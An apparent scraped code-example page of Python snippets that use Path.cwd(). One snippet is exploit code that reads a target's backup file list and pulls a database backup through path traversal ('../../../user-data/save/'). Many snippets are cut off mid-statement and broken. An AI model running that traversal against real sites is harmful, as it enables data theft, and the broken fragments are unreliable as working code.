Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
def test_srpm_command_for_path(upstream_or_distgit_path, tmp_path):
with cwd(tmp_path):
call_real_packit(parameters=["--debug", "srpm", str(upstream_or_distgit_path)])
srpm_path = list(Path.cwd().glob("*.src.rpm"))[0]
assert srpm_path.exists()
def run_program(*args, glob: bool = False):
"""Run subprocess with given args. Use path globbing for each arg that contains an asterisk."""
if glob:
cwd = pathlib.Path.cwd()
args = tuple(itertools.chain.from_iterable(
list(str(_.relative_to(cwd)) for _ in cwd.glob(arg)) if '*' in arg else [arg]
for arg in args))
process = subprocess.Popen(args)
if process.returncode != 0:
raise AssertionError('execution of {} returned {}'.format(args, process.returncode))
return process
def download(ctx, version, dest_dir, force):
installer = download_installer(version)
if dest_dir is None:
dest_dir = pathlib.Path.cwd()
target = pathlib.Path(dest_dir,
if target.exists() and not force:
click.echo('Target exists: {}'.format(target), err=True)
click.echo('NOTE: Use --force to overwrite destination.', err=True)
shutil.move(str(installer), str(target))
click.echo('{} installer is downloaded successfully to {}'.format(
version, target,
def save_ignores(self):
backup_file_name = str(
/ "ignores"
/ f"ignores.{'%Y-%m-%d--%H:%M:%S')}.json"
shutil.move(self._ignorefile, backup_file_name)
with open(self._ignorefile, "w+") as ignores:
ignores.write(json.dumps(self.ignores, indent=4))
import sendgrid
from sendgrid.helpers.mail import Email, Content, Mail
from config import get_config
from pathlib import Path
email_path = Path.cwd() / "email-templates"
appConfig = get_config()
sg = sendgrid.SendGridAPIClient(apikey=appConfig.SENDGRID_API_KEY)
def send_reset_email(user, reset):
def build_reset_email():
reset_email = open(f"{email_path}/password-reset.html", "r").read()
reset_email = reset_email.replace("{{from_org}}", appConfig.FROM_ORG_NAME)
reset_email = reset_email.replace(
"{{ttl}}", str(appConfig.PASSWORD_RESET_LINK_TTL_HOURS)
reset_email = reset_email.replace(
"{{action_url}}", f"{appConfig.FROM_WEBSITE_URL}/reset/{reset.UUID}"
def export_dotfile(self, filename: PathLike = None) -> None:
""" exports the resources tree as a DOT file to the file specified by `filename`. Defaults to in the local directory otherwise """
if filename is None:
filename = Path.cwd().joinpath('')
filename = Path(filename).expanduser().absolute()
root = self.__find_root_node(self.items[0])
DotExporter(root, nodenamefunc=self.__format_node_name).to_dotfile(filename)
elif choice == 2:
backupfiles = requests.get("http://"+rhost+"/restore.php?file=", cookies=cj)
RecentesData = backupfiles.text
finder = re.findall(r'a href=".*"', RecentesData)
names = finder[0].replace('"','').replace('javascript:deletefile','').replace('a href=javascript:restore','').replace('save','').replace("'",'').replace('(','').replace(')','').replace(',','').strip()
print ("+ [*] Backup File Name : " + names)
DB = requests.get("http://"+rhost+"/showfile.php?section=0&pompier=1&file=../../../user-data/save/"+names+"", cookies=cj)
with open(names, "wb") as handle:
for data in tqdm(DB.iter_content()):
p = str(Path.cwd())
print(Fore.GREEN + "+ [*] Backup successfully downloaded. Directory path : " + p + "/" + names)
print("Invalid input!")
def __init__(self, project_name, stubs, **kwargs):
self.path = Path.cwd() / project_name =
self.stubs = stubs
self.log = Log().add_logger(, 'cyan')
import script_fixtures.user as user"Squid API version: {}".format(squid_py.__version__))
# get_registered_ddo -> register_service_agreement_template -> get_conditions_data_from_keeper_contracts
# The data:
# contract_addresses
# fingerprints
# fulfillment_indices
# conditions_keys
# %% [markdown]
# ### Section 1: Instantiate a simulated User
# The contract addresses are loaded from file
PATH_CONFIG = pathlib.Path.cwd() / 'config_local.ini'
assert PATH_CONFIG.exists(), "{} does not exist".format(PATH_CONFIG)
ocn = Ocean(config_file=PATH_CONFIG)
print("HTTP Client:")
print("Secret Store Client:")
# This utility function gets all simulated accounts
users = user.get_all_users(ocn.accounts)
# We don't need this ocn instance reference anymore
del ocn
# Let's take the first unlocked account, and name it the Publisher
publisher1 = [u for u in users if not u.locked][0]
def dirpath(self) -> Path:
return Path.cwd().joinpath('.pulumi')